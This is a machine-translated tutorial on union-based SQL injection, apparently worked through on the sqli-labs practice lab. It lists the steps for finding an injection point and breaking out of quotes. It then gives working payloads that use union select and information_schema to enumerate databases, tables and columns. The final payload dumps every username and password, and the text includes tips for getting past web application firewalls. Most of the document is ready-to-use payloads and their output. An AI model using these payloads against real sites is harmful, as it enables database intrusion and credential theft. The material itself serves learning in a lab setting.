#premise
First of all, when we do any injection, the first thing to do is to judge whether it is a character or a number. If it is a number, you don’t need to care about its closing method.
Now here we have judged that her closing method is closed with ' single quotation marks. After confirming her closing method, we directly use --+ to comment out the following content directly.
Because we typed an extra ' single quotation mark when we closed it, resulting in a built-in single quotation mark behind it, so we have to use --+ to comment out the following single quotation mark to prevent her from reporting an error and affecting Our injection test
Then use the sql statement to test the query in the middle part
#process
1. Find the injection point
2. Determine whether it is a character or a number (and 1=1 and 1=2 or 3-1)
3. Judging the closing method ( ' ') " ") )
4. Determine the number of fields (group by order by)
5. Determine the number of fields displayed (-1 union select 1,2,3.....)
6. Determine the database name (Databases())
7. Determine the data table name of the query (table_name information_schema.tables)
8. Get fields (columns) (column_name information_schema.columns)
9. Out of storage
Supplement: For digital injection, skip the step of judging the closing method directly.
Demo case:
1. Find the injection point
2. Judgment of character type and number type
original interface
name:stupid
Go 5-1
name:stupid
The interface is still the same, make sure it is a character type
3. Determine the closing method
Carry out the ' ') ") " test, which interface returns an error, take out the returned statement, and make further judgments
Here is the error returned by '
Remove the single quotes that she belongs to the output of the statement
The red part is what we entered
Her original closing method is' '
Make sure she is closing with ' '
4. Determine the number of fields
Query fields:
group by
or by
Note: It is recommended to use group by because oder by is often filtered out by waf software. But if there are some errors when using group by, use oder by to query
Since ' is closed by us, we need to use --+ to remove her own '
Use group by to query fields in the middle
An error is reported when the query reaches 4
Query 3, the page is normal
Determine the number of fields 3
5. Determine the fields displayed on the interface
-5 ' Union Select 1,2,3 --+
Determine page display fields
2,3
6. Determine the database name
database(): The database being used
-5' union select 1,database(),3 --+
Determine the database name
security
7. Query all table names in the security database
-5' union select 1,2,Group_concat(table_name) from information_schema.tables where table_schema=database() --+or
-5' union select 1,2,Group_concat(table_name) from information_schema.tables where table_schema='security'The first one is better to bypass waf
Right click -> view page source code
All data tables of the security database are as follows
emails,
referers,
uagents,
users
8. Get fields (query all fields in the users table)
-5' union select 1,2,Group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+or
-5' union select 1,2,Group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+
The following are the fields
id,
username,
password
9. Out of storage
-5' union select 1,2,group_concat(username,'--',password) from security.users --+ 
Dumb--Dumb,
Angelina--I-kill-you,
Dummy--p@ssword,
secure--crappy,
stupid--stupidity,
superman--genius,
batman--mob!le,
admin--admin,
admin1--admin1,
admin2--admin2,
admin3--admin3,
Dhakan-Dumbo,
admin4--admin4
The above is the user and password information for all databases
Note: In fact, I personally think that the data queried by using hex is more complete... because I did an experiment last time and used group_concat(table_name) to get the table name without getting a lot of table name information, but hex( group_concat(table_name)) gets more...it depends on the individual, I still like hex